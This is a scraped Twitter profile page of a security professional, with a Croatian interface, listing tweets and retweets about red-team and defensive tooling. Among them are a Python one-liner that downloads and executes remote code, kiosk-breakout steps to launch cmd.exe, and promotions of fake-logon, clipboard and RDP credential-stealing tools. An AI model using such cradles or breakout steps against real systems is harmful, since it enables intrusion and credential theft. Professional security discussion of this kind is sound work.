Carrie Roberts

@OrOneEqualsOne

Red Teamer turned Blue, Infosec, GSE

github.com/clr2of8
Vrijeme pridruživanja: listopad 2014.
26 fotografija ili videozapisa Fotografije i videozapisi

Tweetovi

Blokirali ste korisnika/cu @OrOneEqualsOne

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @OrOneEqualsOne

  1. Prikvačeni tweet
    1. pro 2016.

    I'm sharing a helpful tool I developed for reporting on password usage in a Windows domain, webcast coming soon:

    129 proslijeđenih tweetova 229 korisnika označava da im se sviđa
    Poništi
  2. proslijedio/la je Tweet
    prije 4 sata

    It was my pleasure to work on this with and , two excellent analysts. Malware analysis provided by the awesome .

    7 replies 30 proslijeđenih tweetova 52 korisnika označavaju da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  3. proslijedio/la je Tweet
    prije 3 sata

    I'll always miss people here, because the industry is filled with awesome analysts/researchers. and as well. Sorry to any I missed. It is not intentional.

    1 reply 1 proslijeđeni tweet 6 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  4. proslijedio/la je Tweet
    prije 3 sata

    Crap! I forgot , author of IRIS-H (referenced in the blog). If you haven't experienced the joy of using his document forensic tool, please try it! There is nothing else like it.

    1 reply 1 proslijeđeni tweet 6 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  5. proslijedio/la je Tweet
    27. sij

    Complexity impresses your peers. Clarity impresses your customers.

    13 replies 413 proslijeđenih tweetova 1.588 korisnika označava da im se sviđa
    Poništi
  6. 3. velj

    Wow, I've been wanting this for a long time. Nice job!

    is a C# utility to steal a user's password using a fake Windows logon screen. This password will then be validated and saved to disk. Useful in combination with 's execute-assembly command.
    6 korisnika označava da im se sviđa
    Poništi
  7. proslijedio/la je Tweet
    3. velj
    Odgovor korisniku/ci

    Nice work Jan, thank you for sharing! My colleague did an extensive write-up on this style of maldoc technique, it's definitely a weird interaction.

    1 reply 1 proslijeđeni tweet 3 korisnika označavaju da im se sviđa
    Poništi
  8. proslijedio/la je Tweet
    28. sij

    Just published my latest blog titled (Ab)using Kerberos from Linux, which covers common Kerberos abuse vectors, as well as how to exploit them from Linux using Impacket. Check it out here:

    7 replies 103 proslijeđena tweeta 252 korisnika označavaju da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  9. proslijedio/la je Tweet
    27. sij

    Windows Kiosk breakout tip: If you get a Printing panel, and the traditional methods don't work: Amongst the printers, select "SendTo OneNote" OneNote will launch -> Add new notebook On the Notebook -> New page Type: \\127.0.0.1\c$\windows\system32\cmd.exe Click the link

    28 replies 651 proslijeđeni tweet 2.708 korisnika označava da im se sviđa
    Poništi
  10. proslijedio/la je Tweet
    27. sij

    New week new opportunities! I threw together a pair of scripts to monitor the clipboard on Windows and macOS to gather passwords from password managers. Make it an awesome week!

    7 replies 35 proslijeđenih tweetova 97 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  11. proslijedio/la je Tweet
    26. sij
    Odgovor korisniku/ci

    Nice! I use

    1 reply 3 proslijeđena tweeta 25 korisnika označava da im se sviđa
    Poništi
  12. 24. sij

    Just enjoyed listening to on the InfoSec Career Podcast with . It was encouraging, entertaining and full of good advice. Thanks!

    2 proslijeđena tweeta 4 korisnika označavaju da im se sviđa
    Poništi
  13. proslijedio/la je Tweet
    24. sij

    Python equivalent of PowerShell IEX cradle: python -c 'import urllib2;r=urllib2.urlopen("");exec(())' Let me know if anyone has a better way to do it, but this seems to work.

    38 proslijeđenih tweetova 149 korisnika označava da im se sviđa
    Poništi
  14. proslijedio/la je Tweet
    22. sij

    Revisiting RDP lateral movement and releasing a project that will be part of a bigger tool coming next week

    25 replies 485 proslijeđenih tweetova 884 korisnika označavaju da im se sviđa
    Poništi
  15. proslijedio/la je Tweet
    18. sij

    Okay here it is, Zipper a new file and folder compression utility for CobaltStrike. Blue Teams/Hunters/Defenders: Lookout for non file-compression related processes creating (random named) zipfiles within temp folders.

    131 proslijeđeni tweet 264 korisnika označavaju da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  16. proslijedio/la je Tweet
    15. sij

    Microsoft added Event ID 1 to the Application Log to show attempted exploitation of CVE-2020-0601 (via new CveEventWrite function). Use Splunk? Collect that EID and alert on: sourcetype=WinEventLog EventCode=1 LogName=Application Message="*[CVE-2020-0601]*" (tweak as needed)
    Prikaži ovu nit
    1 reply 1 proslijeđeni tweet 1 korisnik označava da mu se sviđa
    Poništi
  17. proslijedio/la je Tweet
    14. sij

    On behalf of the entire Atomic Red Team community, we are incredibly thankful for the contributions! And special thanks to for taking on the added responsibility of serving as a maintainer. The first to hail from beyond the nest! ❤️💙

    Did you know that has become one of the largest contributors to the Atomic Red Team project recently? And we're just getting started ... Contributors: et al
    2 proslijeđena tweeta 29 korisnika označava da im se sviđa
    Poništi
  18. proslijedio/la je Tweet
    10. sij

    Recently I was on a pentest and needed to manage Active Directory groups from Linux to achieve privilege escalation. If you find yourself in a similar scenario, this is what you can do:

    7 replies 223 proslijeđena tweeta 577 korisnika označava da im se sviđa
    Poništi
  19. 7. sij

    I have a 19yo daughter in web dev, she is taking a web pentesting class. She just came in my office all jazzed up about session fixation and wanted to confirm with me it really works that way. As she walked out of my office she said "and that's why you don't click on links!" LOL

    2 proslijeđena tweeta 58 korisnika označava da im se sviđa
    Poništi
  20. proslijedio/la je Tweet
    3. pro 2019.

    0.55 is finally out, just in time for ! Main changes: olevba += SLK file parser and XLM macro extraction, VBA stomping detection More info: How to install/update: pip install -U oletools

    80 proslijeđenih tweetova 158 korisnika označava da im se sviđa
    Poništi
  21. proslijedio/la je Tweet
    13. stu 2019.

    New blog post by on extracting clear-text credentials from RDP using RdpThief

    8 replies 456 proslijeđenih tweetova 761 korisnik označava da mu se sviđa
    Poništi

@OrOneEqualsOne još nije objavio nijedan Tweet.

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·